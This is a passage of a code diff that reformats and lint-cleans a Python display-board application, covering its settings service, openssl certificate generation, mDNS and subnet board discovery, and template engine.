+                with open(self.settings_file) as f:  # noqa: PTH123
                     return json.load(f)
             except (OSError, json.JSONDecodeError) as e:
                 logger.warning(f"Failed to load settings file: {e}")
@@ -461,7 +477,9 @@ class SettingsService:
                 "plugins": self._plugins.to_dict(),
                 "temporary_override": self._temporary_override.to_dict() if self._temporary_override else None,
             }
-            with open(self.settings_file, 'w') as f:
+            # Use builtins.open (not Path.open) so existing tests can
+            # patch builtins.open to inject write errors.
+            with open(self.settings_file, "w") as f:  # noqa: PTH123
                 json.dump(data, f, indent=2)
             logger.debug("Settings saved to file")
         except OSError as e:
@@ -475,11 +493,12 @@ class SettingsService:
             return TransitionSettings.from_dict(file_data["transitions"])
 
         # Fall back to env
-        from ..config import Config
+        from src.config import Config
+
         return TransitionSettings(
             strategy=Config.FB_TRANSITION_STRATEGY,
             step_interval_ms=Config.FB_TRANSITION_INTERVAL_MS,
-            step_size=Config.FB_TRANSITION_STEP_SIZE
+            step_size=Config.FB_TRANSITION_STEP_SIZE,
         )
 
     def _load_output_settings(self) -> OutputSettings:
@@ -490,7 +509,8 @@ class SettingsService:
             return OutputSettings.from_dict(file_data["output"])
 
         # Fall back to env
-        from ..config import Config
+        from src.config import Config
+
         return OutputSettings(target=Config.OUTPUT_TARGET)
 
     def _load_active_page_settings(self) -> ActivePageSettings:
@@ -537,7 +557,8 @@ class SettingsService:
             return False
 
         try:
-            from ..config_manager import get_config_manager
+            from src.config_manager import get_config_manager
+
             global_cfg = get_config_manager().get_board()
         except Exception:
             return False
@@ -623,10 +644,7 @@ class SettingsService:
         return self._transition
 
     def update_transition_settings(
-        self,
-        strategy: str | None = ...,
-        step_interval_ms: int | None = ...,
-        step_size: int | None = ...
+        self, strategy: str | None = ..., step_interval_ms: int | None = ..., step_size: int | None = ...
     ) -> TransitionSettings:
         """Update transition settings.
 
@@ -813,7 +831,8 @@ class SettingsService:
         Returns:
             Updated BoardSettings
         """
-        from ..devices import DEVICE_TYPES, BoardInstance
+        from src.devices import DEVICE_TYPES, BoardInstance
+
         valid_devices = [d for d in devices if d in DEVICE_TYPES]
         if not valid_devices:
             raise ValueError(f"At least one valid device required. Valid types: {DEVICE_TYPES}")
@@ -836,11 +855,13 @@ class SettingsService:
                 while name in existing_names:
                     name = f"My Board {n}"
                     n += 1
-                new_boards.append(BoardInstance(
-                    name=name,
-                    device_type=dt,
-                    board_color=self._board.board_type or "black",
-                ).to_dict())
+                new_boards.append(
+                    BoardInstance(
+                        name=name,
+                        device_type=dt,
+                        board_color=self._board.board_type or "black",
+                    ).to_dict()
+                )
 
         self._board.boards = new_boards
         self._save_to_file()
@@ -860,7 +881,8 @@ class SettingsService:
         Returns:
             Updated BoardSettings
         """
-        from ..devices import BoardInstance
+        from src.devices import BoardInstance
+
         if not boards:
             raise ValueError("At least one board instance is required")
 
@@ -894,7 +916,8 @@ class SettingsService:
         Returns:
             Updated BoardSettings
         """
-        from ..devices import BoardInstance
+        from src.devices import BoardInstance
+
         if not board.get("name"):
             board["name"] = self._next_board_name()
         instance = BoardInstance.from_dict(board)
@@ -991,7 +1014,7 @@ class SettingsService:
         """
         if "enabled" in updates:
             self._mqtt.enabled = bool(updates["enabled"])
-        if "broker_host" in updates and updates["broker_host"]:
+        if updates.get("broker_host"):
             self._mqtt.broker_host = updates["broker_host"]
         if "broker_port" in updates:
             self._mqtt.broker_port = int(updates["broker_port"] or 1883)
@@ -1016,13 +1039,9 @@ class SettingsService:
         if "reduce_motion" in updates:
             self._display.reduce_motion = bool(updates["reduce_motion"])
         if "board_animations" in updates:
-            self._display.board_animations = _coerce_board_animations(
-                updates["board_animations"]
-            )
+            self._display.board_animations = _coerce_board_animations(updates["board_animations"])
         if "site_animations" in updates:
-            self._display.site_animations = _coerce_site_animations(
-                updates["site_animations"]
-            )
+            self._display.site_animations = _coerce_site_animations(updates["site_animations"])
         self._save_to_file()
         logger.info(f"Display settings updated: {self._display}")
         return self._display
@@ -1137,4 +1156,3 @@ def get_settings_service() -> SettingsService:
     if _settings_service is None:
         _settings_service = SettingsService()
     return _settings_service
-

--- a/src/system/__init__.py
+++ b/src/system/__init__.py
@@ -1,2 +1,1 @@
 """System management module for Docker container control and mDNS discovery."""
-

--- a/src/system/https_certs.py
+++ b/src/system/https_certs.py
@@ -170,9 +170,7 @@ def generate_cert(
         return cert_path, key_path
 
     if not _openssl_available():
-        raise RuntimeError(
-            "openssl CLI not found; cannot generate self-signed certificate."
-        )
+        raise RuntimeError("openssl CLI not found; cannot generate self-signed certificate.")
 
     cert_path.parent.mkdir(parents=True, exist_ok=True)
 
@@ -199,25 +197,30 @@ def generate_cert(
         f"subjectAltName = {','.join(san_entries)}\n"
     )
 
-    with tempfile.NamedTemporaryFile(
-        mode="w", suffix=".cnf", delete=False
-    ) as cfg_file:
+    with tempfile.NamedTemporaryFile(mode="w", suffix=".cnf", delete=False) as cfg_file:
         cfg_file.write(config_text)
         cfg_path = cfg_file.name
 
     try:
         cmd = [
-            "openssl", "req", "-x509",
-            "-newkey", "rsa:2048",
+            "openssl",
+            "req",
+            "-x509",
+            "-newkey",
+            "rsa:2048",
             "-sha256",
             "-nodes",
-            "-days", str(CERT_VALID_DAYS),
-            "-keyout", str(key_path),
-            "-out", str(cert_path),
-            "-config", cfg_path,
+            "-days",
+            str(CERT_VALID_DAYS),
+            "-keyout",
+            str(key_path),
+            "-out",
+            str(cert_path),
+            "-config",
+            cfg_path,
         ]
         try:
-            result = subprocess.run(  # noqa: S603 - args list, no shell
+            result = subprocess.run(
                 cmd,
                 check=True,
                 capture_output=True,
@@ -226,21 +229,19 @@ def generate_cert(
             )
             logger.debug("openssl stderr: %s", result.stderr.strip())
         except subprocess.CalledProcessError as e:
-            raise RuntimeError(
-                f"openssl failed to generate cert: {e.stderr or e.stdout}"
-            ) from e
+            raise RuntimeError(f"openssl failed to generate cert: {e.stderr or e.stdout}") from e
         except subprocess.TimeoutExpired as e:
             raise RuntimeError("openssl timed out generating cert") from e
     finally:
         try:
-            os.unlink(cfg_path)
+            Path(cfg_path).unlink()
         except OSError as e:
             logger.debug("Failed to remove temporary openssl config %s: %s", cfg_path, e)
 
     # Lock down the private key permissions. The cert is fine world-readable.
     try:
-        os.chmod(key_path, 0o600)
-        os.chmod(cert_path, 0o644)
+        key_path.chmod(0o600)
+        cert_path.chmod(0o644)
     except OSError as e:
         logger.warning("Failed to chmod cert files: %s", e)
 

--- a/src/system/https_certs_cli.py
+++ b/src/system/https_certs_cli.py
@@ -34,7 +34,7 @@ def main(argv: list[str] | None = None) -> int:
     if cmd == "ensure":
         try:
             https_certs.generate_cert()
-        except Exception as e:  # noqa: BLE001 - surface to shell
+        except Exception as e:
             print(f"failed to generate cert: {e}", file=sys.stderr)
             return 1
         return 0

--- a/src/system/mdns.py
+++ b/src/system/mdns.py
@@ -36,13 +36,8 @@ class MDNSService:
         hostname: str | None = None,
         port: int | None = None,
     ) -> None:
-        self._hostname = (
-            hostname
-            or os.environ.get("MDNS_HOSTNAME", DEFAULT_MDNS_HOSTNAME)
-        )
-        self._port = port or int(
-            os.environ.get("MDNS_PORT", str(DEFAULT_SERVICE_PORT))
-        )
+        self._hostname = hostname or os.environ.get("MDNS_HOSTNAME", DEFAULT_MDNS_HOSTNAME)
+        self._port = port or int(os.environ.get("MDNS_PORT", str(DEFAULT_SERVICE_PORT)))
         self._zeroconf = None
         self._service_info = None
         self._started = False
@@ -104,9 +99,7 @@ class MDNSService:
             )
             return True
         except ImportError:
-            logger.warning(
-                "zeroconf package not installed – mDNS advertisement disabled"
-            )
+            logger.warning("zeroconf package not installed – mDNS advertisement disabled")
             return False
         except Exception:
             logger.warning("Failed to start mDNS service", exc_info=True)
@@ -231,19 +224,18 @@ def scan_for_boards(timeout: float = 4.0) -> list[dict[str, Any]]:
                 port = info.port
                 hostname = (info.server or "").rstrip(".")
                 svc_name = name.lower()
-                is_vestaboard = (
-                    "vestaboard" in svc_name
-                    or port == _VESTABOARD_LOCAL_API_PORT
-                )
+                is_vestaboard = "vestaboard" in svc_name or port == _VESTABOARD_LOCAL_API_PORT
                 if is_vestaboard:
                     for addr in addresses:
                         with lock:
-                            discovered.append({
-                                "ip": addr,
-                                "port": port,
-                                "hostname": hostname,
-                                "source": "mdns",
-                            })
+                            discovered.append(
+                                {
+                                    "ip": addr,
+                                    "port": port,
+                                    "hostname": hostname,
+                                    "source": "mdns",
+                                }
+                            )
 
             def remove_service(self, zc: Zeroconf, type_: str, name: str) -> None:
                 pass
@@ -253,10 +245,7 @@ def scan_for_boards(timeout: float = 4.0) -> list[dict[str, Any]]:
 
         zc = Zeroconf()
         listener = _Listener()
-        browsers = [
-            ServiceBrowser(zc, stype, listener)
-            for stype in _BROWSE_SERVICE_TYPES
-        ]
+        browsers = [ServiceBrowser(zc, stype, listener) for stype in _BROWSE_SERVICE_TYPES]
 
         time.sleep(timeout)
         for browser in browsers:
@@ -301,12 +290,14 @@ def scan_for_boards(timeout: float = 4.0) -> list[dict[str, Any]]:
             for ip in probe_results:
                 if ip not in seen_ips:
                     seen_ips.add(ip)
-                    results.append({
-                        "ip": ip,
-                        "port": _VESTABOARD_LOCAL_API_PORT,
-                        "hostname": "",
-                        "source": "port_scan",
-                    })
+                    results.append(
+                        {
+                            "ip": ip,
+                            "port": _VESTABOARD_LOCAL_API_PORT,
+                            "hostname": "",
+                            "source": "port_scan",
+                        }
+                    )
     except Exception:
         logger.warning("Subnet port-probe phase failed", exc_info=True)
 

--- a/src/templates/__init__.py
+++ b/src/templates/__init__.py
@@ -3,5 +3,3 @@
 from .engine import TemplateEngine, get_template_engine, reset_template_engine
 
 __all__ = ["TemplateEngine", "get_template_engine", "reset_template_engine"]
-
-

--- a/src/templates/engine.py
+++ b/src/templates/engine.py
@@ -33,9 +33,10 @@ import re
 from dataclasses import dataclass
 from typing import Any
 
-from ..devices import DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS
-from ..plugins import get_plugin_registry
-from ..text_utils import extract_alignment_from_line
+from src.devices import DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS
+from src.plugins import get_plugin_registry
+from src.text_utils import extract_alignment_from_line
+
 from .expressions import find_formulas, render_expressions, validate_expression
 
 logger = logging.getLogger(__name__)
@@ -69,22 +70,24 @@ SYMBOL_CHARS = {
 }
 
 
-
 # Regex patterns
 # Note: ``[^}{]+`` (rather than ``[^}]+``) prevents overlapping matches and
 # eliminates polynomial backtracking on inputs like ``{{{{{{...``.  Variable
 # expressions never contain ``{`` themselves.
-VAR_PATTERN = re.compile(r'\{\{([^}{]+)\}\}')  # {{source.field}} or {{source.field|filter}}
-COLOR_PATTERN = re.compile(r'\{\{(red|orange|yellow|green|blue|violet|purple|white|black|6[3-9]|7[01])\}\}', re.IGNORECASE)
-SYMBOL_PATTERN = re.compile(r'\{(sun|star|cloud|rain|snow|storm|fog|partly|heart|check|x)\}', re.IGNORECASE)
-FILL_SPACE_PATTERN = re.compile(r'\{\{fill_space\}\}', re.IGNORECASE)
-FILL_SPACE_REPEAT_PATTERN = re.compile(r'\{\{fill_space_repeat:(.+?)\}\}', re.IGNORECASE)
-FILLED_PATTERN = re.compile(r'\{\{filled:(.+?)\}\}', re.IGNORECASE)
+VAR_PATTERN = re.compile(r"\{\{([^}{]+)\}\}")  # {{source.field}} or {{source.field|filter}}
+COLOR_PATTERN = re.compile(
+    r"\{\{(red|orange|yellow|green|blue|violet|purple|white|black|6[3-9]|7[01])\}\}", re.IGNORECASE
+)
+SYMBOL_PATTERN = re.compile(r"\{(sun|star|cloud|rain|snow|storm|fog|partly|heart|check|x)\}", re.IGNORECASE)
+FILL_SPACE_PATTERN = re.compile(r"\{\{fill_space\}\}", re.IGNORECASE)
+FILL_SPACE_REPEAT_PATTERN = re.compile(r"\{\{fill_space_repeat:(.+?)\}\}", re.IGNORECASE)
+FILLED_PATTERN = re.compile(r"\{\{filled:(.+?)\}\}", re.IGNORECASE)
 
 
 @dataclass
 class TemplateError:
     """Template validation error."""
+
     line: int
     column: int
     message: str
@@ -128,7 +131,8 @@ class TemplateEngine:
     def display_service(self):
         """Lazy-load display service to avoid circular imports."""
         if self._display_service is None:
-            from ..displays.service import get_display_service
+            from src.displays.service import get_display_service
+
             self._display_service = get_display_service()
         return self._display_service
 
@@ -136,7 +140,8 @@ class TemplateEngine:
     def config_manager(self):
         """Lazy-load config manager to avoid circular imports."""
         if self._config_manager is None:
-            from ..config_manager import get_config_manager
+            from src.config_manager import get_config_manager
+
             self._config_manager = get_config_manager()
         return self._config_manager
 
@@ -172,9 +177,7 @@ class TemplateEngine:
         result = self._render_variables(result, context)
 
         # Process symbols (single brackets like {sun})
-        result = self._render_symbols(result)
-
-        return result
+        return self._render_symbols(result)
 
     def _count_tiles(self, text: str) -> int:
         """Count the number of tiles in a text string.
@@ -195,7 +198,7 @@ class TemplateEngine:
             if text[i] == "{":
                 closing_brace = text.find("}", i)
                 if closing_brace != -1:
-                    content = text[i + 1:closing_brace]
+                    content = text[i + 1 : closing_brace]
                     # Check if it's a color code (numeric 63-71 or named)
                     if content.isdigit():
                         code = int(content)
@@ -240,19 +243,19 @@ class TemplateEngine:
             if text[i] == "{":
                 closing_brace = text.find("}", i)
                 if closing_brace != -1:
-                    content = text[i + 1:closing_brace]
+                    content = text[i + 1 : closing_brace]
                     # Check if it's a color code (numeric 63-71 or named)
                     if content.isdigit():
                         code = int(content)
                         if 63 <= code <= 71:
                             # Numeric color code like {66}, {70}, or {71}
-                            result.append(text[i:closing_brace + 1])
+                            result.append(text[i : closing_brace + 1])
                             tile_count += 1
                             i = closing_brace + 1
                             continue
                     elif content.lower() in COLOR_CODES:
                         # Named color like {green}
-                        result.append(text[i:closing_brace + 1])
+                        result.append(text[i : closing_brace + 1])
                         tile_count += 1
                         i = closing_brace + 1
                         continue
@@ -300,8 +303,7 @@ class TemplateEngine:
         if context is None:
             context = self._build_context()
 
-        dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE,
-                                      DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
+        dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
         num_rows = dims.rows
         board_width = dims.cols
 
@@ -318,7 +320,9 @@ class TemplateEngine:
         for i, line in enumerate(lines):
             if line_metadata and i < len(line_metadata):
                 meta = line_metadata[i]
-                alignments.append(meta.get("alignment", "left") if isinstance(meta, dict) else getattr(meta, "alignment", "left"))
+                alignments.append(
+                    meta.get("alignment", "left") if isinstance(meta, dict) else getattr(meta, "alignment", "left")
+                )
                 wraps.append(meta.get("wrap", False) if isinstance(meta, dict) else getattr(meta, "wrap", False))
                 contents.append(line)
             else:
@@ -347,7 +351,7 @@ class TemplateEngine:
             wrap_enabled = wraps[i]
             content = contents[i]
 
-            has_wrap = wrap_enabled or '|wrap}}' in content or '|wrap|' in content
+            has_wrap = wrap_enabled or "|wrap}}" in content or "|wrap|" in content
 
             if has_wrap:
                 # Wrap region: count how many lines below this one are
@@ -362,7 +366,7 @@ class TemplateEngine:
                     if contents[j].strip() == "":
                         empty_count += 1
                         continue
-                    if wraps[j] or '|wrap}}' in contents[j] or '|wrap|' in contents[j]:
+                    if wraps[j] or "|wrap}}" in contents[j] or "|wrap|" in contents[j]:
                         empty_count += 1
                         continue
                     if _render_cached(j).strip() == "":
@@ -381,8 +385,8 @@ class TemplateEngine:
             else:
                 rendered_line = _render_cached(i)
 
-                if '\n' in rendered_line:
-                    split_lines = rendered_line.split('\n')
+                if "\n" in rendered_line:
+                    split_lines = rendered_line.split("\n")
                     for line_idx, split_line in enumerate(split_lines):
                         if i + line_idx >= num_rows:
                             break
@@ -394,9 +398,11 @@ class TemplateEngine:
                     rendered_line = self._process_fill_space(rendered_line, width=board_width)
                     rendered[i] = self._apply_alignment(rendered_line, alignment, width=board_width)
 
-        return '\n'.join(rendered)
+        return "\n".join(rendered)
 
-    def _render_with_wrap(self, template: str, context: dict[str, Any], max_lines: int = 1, board_width: int = 22) -> list[str]:
+    def _render_with_wrap(
+        self, template: str, context: dict[str, Any], max_lines: int = 1, board_width: int = 22
+    ) -> list[str]:
         """Render a template line that should wrap across multiple lines.
 
         Handles two cases:
@@ -413,7 +419,7 @@ class TemplateEngine:
             List of rendered lines (up to max_lines)
         """
         # First, check if there's a variable with |wrap filter (variable-level wrap)
-        wrap_pattern = re.compile(r'\{\{([^}]+\|wrap(?:\|[^}]*)?)\}\}')
+        wrap_pattern = re.compile(r"\{\{([^}]+\|wrap(?:\|[^}]*)?)\}\}")
         match = wrap_pattern.search(template)
 
         if match:
@@ -421,9 +427,9 @@ class TemplateEngine:
             # Get the variable expression (without |wrap)
             expr = match.group(1)
             # Remove |wrap from the filter chain
-            parts = expr.split('|')
+            parts = expr.split("|")
             var_part = parts[0].strip()
-            other_filters = [p for p in parts[1:] if p.lower() != 'wrap']
+            other_filters = [p for p in parts[1:] if p.lower() != "wrap"]
 
             # Get the raw value
             value = self._get_variable_value(var_part, context)
@@ -433,8 +439,8 @@ class TemplateEngine:
                 value = self._apply_filter(value, f)
 
             # Get prefix and suffix around the variable
-            prefix = template[:match.start()]
-            suffix = template[match.end():]
+            prefix = template[: match.start()]
+            suffix = template[match.end() :]
 
             # Render prefix and suffix (they may have other variables)
             prefix = self.render(prefix, context)
@@ -462,15 +468,14 @@ class TemplateEngine:
                     result.append(wrapped_line)
 
             return result
-        else:
-            # Line-level wrap: render the entire template first, then wrap the result
-            rendered = self.render(template, context)
+        # Line-level wrap: render the entire template first, then wrap the result
+        rendered = self.render(template, context)
 
-            # Use tile-based wrapping for the entire rendered content
-            # Full width available on all lines
-            wrapped = self._word_wrap_tiles(rendered, first_width=board_width, subsequent_width=board_width, max_lines=max_lines)
-
-            return wrapped
+        # Use tile-based wrapping for the entire rendered content
+        # Full width available on all lines
+        return self._word_wrap_tiles(
+            rendered, first_width=board_width, subsequent_width=board_width, max_lines=max_lines
+        )
 
     def _word_wrap(self, text: str, first_width: int, subsequent_width: int, max_lines: int) -> list[str]:
         """Word-wrap text across multiple lines.
@@ -541,21 +546,21 @@ class TemplateEngine:
                 # Found a potential color marker
                 closing_brace = text.find("}", i)
                 if closing_brace != -1:
-                    content = text[i + 1:closing_brace]
+                    content = text[i + 1 : closing_brace]
                     # Check if it's a color code
                     if content.isdigit() and 63 <= int(content) <= 70:
                         # It's a numeric color marker
-                        tokens.append(text[i:closing_brace + 1])
+                        tokens.append(text[i : closing_brace + 1])
                         i = closing_brace + 1
                         continue
-                    elif content.lower() in COLOR_CODES:
+                    if content.lower() in COLOR_CODES:
                         # Named color marker
-                        tokens.append(text[i:closing_brace + 1])
+                        tokens.append(text[i : closing_brace + 1])
                         i = closing_brace + 1
                         continue
-                    elif content.startswith("/"):
+                    if content.startswith("/"):
                         # End tag - treat as single token
-                        tokens.append(text[i:closing_brace + 1])
+                        tokens.append(text[i : closing_brace + 1])
                         i = closing_brace + 1
                         continue
 
@@ -594,16 +599,16 @@ class TemplateEngine:
                 # Found a potential color marker
                 closing_brace = text.find("}", i)
                 if closing_brace != -1:
-                    content = text[i + 1:closing_brace]
+                    content = text[i + 1 : closing_brace]
                     # Check if it's a color code
                     if content.isdigit() and 63 <= int(content) <= 70:
                         # It's a color marker - add to current word
-                        current_word += text[i:closing_brace + 1]
+                        current_word += text[i : closing_brace + 1]
                         i = closing_brace + 1
                         continue
-                    elif content.lower() in COLOR_CODES:
+                    if content.lower() in COLOR_CODES:
                         # Named color marker
-                        current_word += text[i:closing_brace + 1]
+                        current_word += text[i : closing_brace + 1]
                         i = closing_brace + 1
                         continue
 
@@ -748,38 +753,38 @@ class TemplateEngine:
 
         Also applies color rules from feature configuration if defined.
         """
+
         def replace_var(match):
             expr = match.group(1).strip()
 
             # Check for filter: {{value|filter:arg}}
-            if '|' in expr:
-                var_part, filter_part = expr.split('|', 1)
+            if "|" in expr:
+                var_part, filter_part = expr.split("|", 1)
                 value = self._get_variable_value(var_part.strip(), context)
                 filtered = self._apply_filter(value, filter_part.strip())
                 # Apply color rules to the variable (before filtering changed it)
                 color_prefix = self._get_color_for_value(var_part.strip(), context)
                 return f"{color_prefix}{filtered}" if color_prefix else filtered
-            else:
-                value = self._get_variable_value(expr, context)
-                # Check if the value itself is a color code (e.g., {66})
-                # This allows plugins to return color codes directly
-                # Only recognize color codes, not color names (to avoid issues with team names like "Green Hornets")
-                if isinstance(value, str):
-                    # Check if value is exactly a color code like {66}
-                    color_code_match = re.match(r'^\{(\d+)\}$', value)
-                    if color_code_match:
-                        code = int(color_code_match.group(1))
-                        if 63 <= code <= 70:
-                            # Already a valid color code, return as-is
-                            return value
-                    # If value already starts with a color code (e.g. {66}RISE), do not add
-                    # a color prefix (which would add an unwanted space after the tile)
-                    if re.match(r'^\{\d+\}', value):
+            value = self._get_variable_value(expr, context)
+            # Check if the value itself is a color code (e.g., {66})
+            # This allows plugins to return color codes directly
+            # Only recognize color codes, not color names (to avoid issues with team names like "Green Hornets")
+            if isinstance(value, str):
+                # Check if value is exactly a color code like {66}
+                color_code_match = re.match(r"^\{(\d+)\}$", value)
+                if color_code_match:
+                    code = int(color_code_match.group(1))
+                    if 63 <= code <= 70:
+                        # Already a valid color code, return as-is
                         return value
+                # If value already starts with a color code (e.g. {66}RISE), do not add
+                # a color prefix (which would add an unwanted space after the tile)
+                if re.match(r"^\{\d+\}", value):
+                    return value
 
-                # Apply color rules
-                color_prefix = self._get_color_for_value(expr, context)
-                return f"{color_prefix}{value}" if color_prefix else value
+            # Apply color rules
+            color_prefix = self._get_color_for_value(expr, context)
+            return f"{color_prefix}{value}" if color_prefix else value
 
         return VAR_PATTERN.sub(replace_var, template)
 
@@ -793,7 +798,7 @@ class TemplateEngine:
         Returns:
             Color prefix like '{65} ' or empty string if no rule matches
         """
-        parts = expr.split('.')
+        parts = expr.split(".")
         if len(parts) < 2:
             return ""
 
@@ -869,11 +874,11 @@ class TemplateEngine:
 
                 if condition == ">":
                     return actual_num > expected_num
-                elif condition == "<":
+                if condition == "<":
                     return actual_num < expected_num
-                elif condition == ">=":
+                if condition == ">=":
                     return actual_num >= expected_num
-                elif condition == "<=":
+                if condition == "<=":
                     return actual_num <= expected_num
 
             # String comparison
@@ -882,14 +887,14 @@ class TemplateEngine:
 
             if condition == "==":
                 return actual_str == expected_str
-            elif condition == "!=":
+            if condition == "!=":
                 return actual_str != expected_str
 
         except (ValueError, TypeError):
             # Fall back to string comparison
             if condition == "==":
                 return str(actual).lower() == str(expected).lower()
-            elif condition == "!=":
+            if condition == "!=":
                 return str(actual).lower() != str(expected).lower()
 
         return False
@@ -914,20 +919,20 @@ class TemplateEngine:
         Returns "???" if variable is unavailable (API error, missing data, etc.)
         """
         # Handle special fill_space variable
-        if expr.lower() == 'fill_space':
-            return '\x00FILL_SPACE\x00'  # Special marker to be processed later
+        if expr.lower() == "fill_space":
+            return "\x00FILL_SPACE\x00"  # Special marker to be processed later
 
         # Handle filled:char — user-facing alias for fill_space_repeat
-        if expr.lower().startswith('filled:'):
-            repeat_str = expr.split(':', 1)[1]
-            return f'\x00FILL_SPACE_REPEAT:{repeat_str}\x00'
+        if expr.lower().startswith("filled:"):
+            repeat_str = expr.split(":", 1)[1]
+            return f"\x00FILL_SPACE_REPEAT:{repeat_str}\x00"
 
         # Handle fill_space_repeat:char/string variable (backward compat)
-        if expr.lower().startswith('fill_space_repeat:'):
-            repeat_str = expr.split(':', 1)[1] if ':' in expr else ' '
-            return f'\x00FILL_SPACE_REPEAT:{repeat_str}\x00'  # Special marker with repeat pattern
+        if expr.lower().startswith("fill_space_repeat:"):
+            repeat_str = expr.split(":", 1)[1] if ":" in expr else " "
+            return f"\x00FILL_SPACE_REPEAT:{repeat_str}\x00"  # Special marker with repeat pattern
 
-        parts = expr.split('.')
+        parts = expr.split(".")
 
         if len(parts) < 2:
             return "???"  # Invalid expression
@@ -936,7 +941,7 @@ class TemplateEngine:
 
         # Special handling for home_assistant with entity_id syntax
         # Format: home_assistant.entity_id.attribute (3 parts minimum)
-        if source == 'home_assistant' and len(parts) >= 3:
+        if source == "home_assistant" and len(parts) >= 3:
             # Convert underscores back to dots for entity_id
             # (entity_id uses dots like sensor.temperature, but dots can't be in template syntax)
             # So we expect: home_assistant.sensor_temperature.state
@@ -945,7 +950,7 @@ class TemplateEngine:
             attribute = parts[2]
 
             # Get home_assistant context data first
-            ha_data = context.get('home_assistant', {})
+            ha_data = context.get("home_assistant", {})
 
             # Smart entity_id conversion: try different underscore positions
             # Some domains have underscores (media_player, binary_sensor, device_tracker, etc.)
@@ -953,13 +958,13 @@ class TemplateEngine:
             entity_id = None
             entity_data = {}
 
-            if '_' in entity_id_part:
+            if "_" in entity_id_part:
                 # Try each underscore position as a potential domain/entity split
-                parts_split = entity_id_part.split('_')
+                parts_split = entity_id_part.split("_")
                 for i in range(1, len(parts_split)):
                     # Try domain as first i parts, rest as entity name
-                    test_domain = '_'.join(parts_split[:i])
-                    test_entity = '_'.join(parts_split[i:])
+                    test_domain = "_".join(parts_split[:i])
+                    test_entity = "_".join(parts_split[i:])
                     test_entity_id = f"{test_domain}.{test_entity}"
 
                     if test_entity_id in ha_data:
@@ -969,7 +974,7 @@ class TemplateEngine:
 
                 # Fallback to old behavior if no match found (replace first underscore)
                 if not entity_data:
-                    entity_id = entity_id_part.replace('_', '.', 1)
+                    entity_id = entity_id_part.replace("_", ".", 1)
                     entity_data = ha_data.get(entity_id, {})
             else:
                 entity_id = entity_id_part
@@ -979,11 +984,11 @@ class TemplateEngine:
                 return "???"  # Entity not found
 
             # Check if requesting the state directly
-            if attribute == 'state':
-                return str(entity_data.get('state', '???'))
+            if attribute == "state":
+                return str(entity_data.get("state", "???"))
 
             # Check if requesting an attribute
-            attributes = entity_data.get('attributes', {})
+            attributes = entity_data.get("attributes", {})
             if attribute in attributes:
                 value = attributes[attribute]
                 # Convert to string
@@ -991,7 +996,7 @@ class TemplateEngine:
                     return "???"
                 if isinstance(value, bool):
                     return "Yes" if value else "No"
-                if isinstance(value, (int, float)):
+                if isinstance(value, int | float):
                     return str(int(value) if float(value).is_integer() else round(value, 1))
                 return str(value)
 
@@ -1002,7 +1007,7 @@ class TemplateEngine:
                     return "???"
                 if isinstance(value, bool):
                     return "Yes" if value else "No"
-                if isinstance(value, (int, float)):
+                if isinstance(value, int | float):
                     return str(int(value) if float(value).is_integer() else round(value, 1))
                 return str(value)
 
@@ -1012,7 +1017,7 @@ class TemplateEngine:
 
         # Check if this is a _color request (case-insensitive)
         field_lower = field.lower()
-        if field_lower.endswith('_color'):
+        if field_lower.endswith("_color"):
             base_field = field_lower[:-6]  # Remove '_color' suffix (already lowercased)
             color_result = self._get_color_only(source, base_field, context)
             # If color lookup fails, return empty string (no color tile)
@@ -1040,8 +1045,8 @@ class TemplateEngine:
                             return "???"  # Index out of range
                     else:
                         # Try bracket notation: stations[0]
-                        if '[' in part and ']' in part:
-                            index_str = part[part.index('[') + 1:part.index(']')]
+                        if "[" in part and "]" in part:
+                            index_str = part[part.index("[") + 1 : part.index("]")]
                             index = int(index_str)
                             if 0 <= index < len(value):
                                 value = value[index]
@@ -1059,7 +1064,7 @@ class TemplateEngine:
             return "???"  # Null value
         if isinstance(value, bool):
             return "Yes" if value else "No"
-        if isinstance(value, (int, float)):
+        if isinstance(value, int | float):
             return str(int(value) if float(value).is_integer() else round(value, 1))
         return str(value)
 
@@ -1145,18 +1150,18 @@ class TemplateEngine:
         - pad:N - Pad to N characters
         - truncate:N - Truncate to N characters
         """
-        if ':' in filter_expr:
-            filter_name, arg = filter_expr.split(':', 1)
+        if ":" in filter_expr:
+            filter_name, arg = filter_expr.split(":", 1)
             filter_name = filter_name.lower()
 
-            if filter_name == 'pad':
+            if filter_name == "pad":
                 try:
                     width = int(arg)
                     return value.ljust(width)[:width]
                 except ValueError:
                     return value
 
-            elif filter_name == 'truncate':
+            elif filter_name == "truncate":
                 try:
                     length = int(arg)
                     return value[:length]
@@ -1167,6 +1172,7 @@ class TemplateEngine:
 
     def _render_symbols(self, template: str) -> str:
         """Replace {symbol} shortcuts with characters."""
+
         def replace_symbol(match):
             symbol = match.group(1).lower()
             return SYMBOL_CHARS.get(symbol, match.group(0))
@@ -1179,6 +1185,7 @@ class TemplateEngine:
         Converts named colors to code format for consistency.
         e.g., {{red}} -> {63} (single brackets so VAR_PATTERN won't match them)
         """
+
         def replace_color(match):
             color = match.group(1).lower()
             if color.isdigit():
@@ -1217,14 +1224,14 @@ class TemplateEngine:
 
         padding_needed = width - tile_count
 
-        if alignment == 'center':
+        if alignment == "center":
             left_pad = padding_needed // 2
             right_pad = padding_needed - left_pad
-            return ' ' * left_pad + text + ' ' * right_pad
-        elif alignment == 'right':
-            return ' ' * padding_needed + text
-        else:  # left (default)
-            return text + ' ' * padding_needed
+            return " " * left_pad + text + " " * right_pad
+        if alignment == "right":
+            return " " * padding_needed + text
+        # left (default)
+        return text + " " * padding_needed
 
     def _process_fill_space(self, text: str, width: int = 22) -> str:
         """Process fill_space markers, expanding them to fill available space.
@@ -1244,10 +1251,10 @@ class TemplateEngine:
         Returns:
             Text with fill_space markers replaced by appropriate padding
         """
-        from ..board_chars import BoardChars
+        from src.board_chars import BoardChars
 
         # Find all fill markers (both regular and repeat)
-        fill_pattern = re.compile(r'\x00FILL_SPACE(?:_REPEAT:(.+?))?\x00')
+        fill_pattern = re.compile(r"\x00FILL_SPACE(?:_REPEAT:(.+?))?\x00")
         fill_matches = list(fill_pattern.finditer(text))
         fill_count = len(fill_matches)
 
@@ -1255,7 +1262,7 @@ class TemplateEngine:
             return text
 
         # Calculate text width without fill_space markers
